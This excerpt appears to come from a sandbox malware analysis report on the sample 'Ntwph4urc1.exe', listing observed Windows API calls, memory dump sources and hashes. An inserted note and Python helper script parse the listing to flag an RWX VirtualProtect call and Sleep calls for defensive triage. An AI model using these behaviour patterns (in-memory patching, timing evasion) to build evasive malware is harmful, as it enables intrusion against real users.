• Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
Similarity
• API ID: ShowWindow
• String ID:
• API String ID: 1268545403-0
• Opcode ID: ed0fba548ae3e193f0e5ef583f5be9fd2d24872a13bb97bcc89e0a3ab6842b84
• Instruction ID: b2fefa23d47a0510f6e3c17d58d1e446f1e854612225740054352d4863a47d08
• Opcode Fuzzy Hash: ed0fba548ae3e193f0e5ef583f5be9fd2d24872a13bb97bcc89e0a3ab6842b84
• Instruction Fuzzy Hash: 5CE0BF76B24114ABCB18DFA8ED90C6E77B6EB95310720847AE512B3690C679AD10CB68
APIs
• GetModuleHandleA.KERNEL32(?,00000020,?,00403514,0000000B), ref: 004067F5
• GetProcAddress.KERNEL32(00000000,?), ref: 00406810
  • Part of subcall function 00406773: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040678A
  • Part of subcall function 00406773: wsprintfW.USER32 ref: 004067C5
  • Part of subcall function 00406773: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067D9
Memory Dump Source
• Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
Similarity
• API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
• String ID:
• API String ID: 2547128583-0
• Opcode ID: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
• Instruction ID: 99a4bc67a8c43757839ce5658996565e88f4cb2ecc15aeea03f34014f97f3c52
• Opcode Fuzzy Hash: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
• Instruction Fuzzy Hash: F2E0863350521056E611AA719D44C7773AC9F89650307843EF946F2080D738DC31ABBD
APIs
• GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\Ntwph4urc1.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405EE8
• CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F0A
Memory Dump Source
• Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
Similarity
• API ID: File$AttributesCreate
• String ID:
• API String ID: 415043291-0
• Opcode ID: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
• Instruction ID: 1030bc0f2bf25390ef9c6131bda9d6cfedcac9e68b753c15eded60bf4a570351
• Opcode Fuzzy Hash: 080dfadfdaad2818d5b04c51cfada36c475993ea7ffea5996e238fb5a0e3a6c4
• Instruction Fuzzy Hash: 5ED09E31254201AFEF098F20DE16F2E7BA2EB94B04F11552CB786941E0DAB15C199B15
APIs
• GetFileAttributesW.KERNELBASE(?,?,00405AC4,?,?,00000000,00405C9A,?,?,?,?), ref: 00405EC4
• SetFileAttributesW.KERNEL32(?,00000000), ref: 00405ED8
Memory Dump Source
• Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
• Instruction ID: 9f802252afbb128bb6d2778500f244350c46036787b5d1505cff2c7139ff2394
• Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
• Instruction Fuzzy Hash: 3CD0C9725055306BC2102728EE0C89BBB55EB64271B114A35F9A5A62B0CB304C528A98
APIs
• CreateDirectoryW.KERNELBASE(?,00000000,00403495,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 004059A8
• GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004059B6
Memory Dump Source
• Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
Similarity
• API ID: CreateDirectoryErrorLast
• String ID:
• API String ID: 1375471231-0
• Opcode ID: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
• Instruction ID: 379133542b1e1e7011c0d69b4b2ae41cc98c6aec5a22f3063a42931ced3e53c7
• Opcode Fuzzy Hash: a5afa482e644e9a10fedfab033ae5dbb8931bf23a9e1c5533d9f8c1a63861871
• Instruction Fuzzy Hash: 1EC04C71205502EEF6115B20DF48B1B7A909B50751F16843DA146E01E4DE389455D92D
                                              APIs
                                              • CreateFileA.KERNELBASE(00000000), ref: 73F52BB7
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2728459124.0000000073F51000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F50000, based on PE: true
                                               • Associated: 00000000.00000002.2726489053.0000000073F50000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000000.00000002.2729055985.0000000073F54000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000000.00000002.2732986252.0000000073F56000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_73f50000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: a417120420d47e1ee394fdcbe98c3372c4ebacfe28ed265696ecf188d6c489d2
                                              • Instruction ID: 99ce4daf79c0bc640d0bedc330ff963b08bbc4b3aa68e36c1ed967e1ffb7b6ea
                                              • Opcode Fuzzy Hash: a417120420d47e1ee394fdcbe98c3372c4ebacfe28ed265696ecf188d6c489d2
                                              • Instruction Fuzzy Hash: 41415CB390030AFFEB21AF65DDA4B5937B9EB443E4F348629F40FC6260D63595818B91
                                              APIs
                                              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403457,00000000,00000000,0040329E,?,00000004,00000000,00000000,00000000), ref: 00405F7B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                              • Instruction ID: e146fa180a083be72d256ad1b428d57881e9eb39a1326beaade4420b40277b6a
                                              • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                              • Instruction Fuzzy Hash: E7E0EC3221065BAFDF10AEA59C04EFB7B6CEB05360F004836FD55E6150D635E9219BA8
                                              APIs
                                              • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,0040340D,000000FF,00793700,?,00793700,?,?,00000004,00000000), ref: 00405FAA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: FileWrite
                                              • String ID:
                                              • API String ID: 3934441357-0
                                              • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                              • Instruction ID: df8aade711aef2fea4c6cc03ed90c08959c6261ddae8de931081f7d2433cde5f
                                              • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                              • Instruction Fuzzy Hash: 96E08C3221021AEBDF109E608C00AEB7B6CEB00360F004433FA24E3150D634E8218BA8
                                              APIs
                                              • VirtualProtect.KERNELBASE(73F5505C,00000004,00000040,73F5504C), ref: 73F529FD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2728459124.0000000073F51000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F50000, based on PE: true
                                               • Associated: 00000000.00000002.2726489053.0000000073F50000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000000.00000002.2729055985.0000000073F54000.00000002.00000001.01000000.00000004.sdmp
                                               • Associated: 00000000.00000002.2732986252.0000000073F56000.00000002.00000001.01000000.00000004.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_73f50000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              • Opcode ID: 421e930dbfd403d93b2473739824ab8d392fa21a1d6320491f870a8e064a8fed
                                              • Instruction ID: 86f6ff497d27898c49da255001a5e3fc7c60d0f79578c726a4356b6fa34185d9
                                              • Opcode Fuzzy Hash: 421e930dbfd403d93b2473739824ab8d392fa21a1d6320491f870a8e064a8fed
                                              • Instruction Fuzzy Hash: 9AF0A5F3501382DEC350EF2A846470A3BE0B7083D4B34452AF19FD6261E3345044DF91
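The entry above is the one in this listing a triager should stop on: VirtualProtect(73F5505C, 4, 0x40, 73F5504C) asks for PAGE_EXECUTE_READWRITE on four bytes at RVA 0x505C of the module loaded at 0x73F50000, which is what in-place patching or hooking looks like. The following Python is an added example, not code from the Joe Sandbox report or its tooling: it parses function entries in the shape shown on this page, attaches each call site to the dump it was found in, groups call sites by image, and flags the RWX protection change and the Sleep call. The sample input is copied from entries on this page; the triage rules and the helper names (`parse_report`, `flag_calls`, `calls_by_image`) are this example's own.

```python
"""Triage helper for Joe Sandbox function listings (added example, not Joe Sandbox code).

Parses entries of the shape

    APIs
    • VirtualProtect.KERNELBASE(73F5505C,00000004,00000040,73F5504C), ref: 73F529FD
    Memory Dump Source
    • Source File: <dump>.sdmp, Offset: 73F50000, based on PE: true

into records, attaches each call site to the memory image it was found in, and
flags a VirtualProtect requesting PAGE_EXECUTE_READWRITE and any Sleep call.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

PAGE_EXECUTE_READWRITE = 0x40  # Win32 memory protection constant

# "• Name.MODULE(arg,arg,...), ref: ADDR"; bullet optional so pasted text without it parses too
API_RE = re.compile(
    r"(?:•\s*)?(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
# "Source File: <dump>, Offset: BASE" gives the base of the image the call site lives in
SRC_RE = re.compile(r"Source File:\s*(?P<dump>[^,\s]+),\s*Offset:\s*(?P<base>[0-9A-Fa-f]+)")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]                    # raw tokens; '?' = not recovered, 'Call' = symbolic
    ref: int                           # address of the call instruction
    image_base: Optional[int] = None   # base of the dump containing the call site
    flags: List[str] = field(default_factory=list)

    def arg_int(self, i: int) -> Optional[int]:
        """Argument i as an int, or None when it is missing, '?', or symbolic."""
        try:
            return int(self.args[i], 16)
        except (IndexError, ValueError):
            return None


def parse_report(text: str) -> List[ApiCall]:
    """Walk the listing; a Source File line belongs to the API call just before it."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = API_RE.search(line)
        if m:
            raw = m["args"].strip()
            args = [a.strip() for a in raw.split(",")] if raw else []
            calls.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16)))
            continue
        m = SRC_RE.search(line)
        if m and calls and calls[-1].image_base is None:
            calls[-1].image_base = int(m["base"], 16)
    return calls


def flag_calls(calls: List[ApiCall]) -> List[ApiCall]:
    """Annotate and return the calls matching the triage rules (rules are this example's own)."""
    for c in calls:
        # VirtualProtect(lpAddress, dwSize, flNewProtect, lpflOldProtect): RWX on a mapped
        # image is the usual signature of in-place patching or hooking.
        if c.name == "VirtualProtect" and c.arg_int(2) == PAGE_EXECUTE_READWRITE:
            target, size = c.arg_int(0), c.arg_int(1)
            if target is None:
                where = "target address not recovered"
            elif c.image_base is not None and target >= c.image_base:
                where = f"{target:08X}, RVA {target - c.image_base:X} of image {c.image_base:08X}"
            else:
                where = f"{target:08X}, outside the calling image"
            c.flags.append(f"RWX (0x40) requested on {size} byte(s) at {where}")
        if c.name == "Sleep":
            c.flags.append("Sleep: candidate for a timing-based evasion loop")
    return [c for c in calls if c.flags]


def calls_by_image(calls: List[ApiCall]) -> dict:
    """Group call names by the dump base of their call site (0x400000 vs 0x73F50000 here)."""
    groups: dict = {}
    for c in calls:
        groups.setdefault(c.image_base, []).append(c.name)
    return groups


# Constructed input: five entries copied from this report, trimmed to the lines the parser needs.
SAMPLE = """\
APIs
• CreateFileA.KERNELBASE(00000000), ref: 73F52BB7
Memory Dump Source
• Source File: 00000000.00000002.2728459124.0000000073F51000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F50000, based on PE: true
APIs
• ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403457,00000000,00000000,0040329E,?,00000004,00000000,00000000,00000000), ref: 00405F7B
Memory Dump Source
• Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
APIs
• VirtualProtect.KERNELBASE(73F5505C,00000004,00000040,73F5504C), ref: 73F529FD
Memory Dump Source
• Source File: 00000000.00000002.2728459124.0000000073F51000.00000020.00000001.01000000.00000004.sdmp, Offset: 73F50000, based on PE: true
APIs
• RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,007A0F28,?,?,004062E9,007A0F28,00000000,?,?,Call,?), ref: 0040627F
Memory Dump Source
• Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
APIs
• Sleep.KERNELBASE(00000000), ref: 004014EA
Memory Dump Source
• Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
"""

if __name__ == "__main__":
    for c in flag_calls(parse_report(SAMPLE)):
        print(f"{c.ref:08X} {c.name}.{c.module}: {'; '.join(c.flags)}")
```

Run as a script it prints the two flagged call sites from SAMPLE: the 4-byte RWX change at RVA 0x505C of the 0x73F50000 module and the Sleep at 0x4014EA. Unrecovered arguments (`?`) and symbolic ones (`Call`) come back as None from `arg_int`, so a rule never misfires on a value the sandbox did not actually observe.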
                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,007A0F28,?,?,004062E9,007A0F28,00000000,?,?,Call,?), ref: 0040627F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: Open
                                              • String ID:
                                              • API String ID: 71445658-0
                                              • Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                              • Instruction ID: 981b209bfbc59ad728c3152e24748ded8346fc425447e23afb42b8d85bc6dac1
                                              • Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                              • Instruction Fuzzy Hash: 35D0123200020DBBDF11AF90ED05FAB372DAB08350F014426FE06A4091D775D530A728
                                              APIs
                                              • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A2
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2691014747.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                               • Associated: 00000000.00000002.2690999891.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691032584.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.000000000077C000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000782000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000786000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.0000000000789000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A4000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A6000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007A9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007AB000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007AE000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007B3000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007C4000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691046936.00000000007C6000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2691353391.00000000007C7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_Ntwph4urc1.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
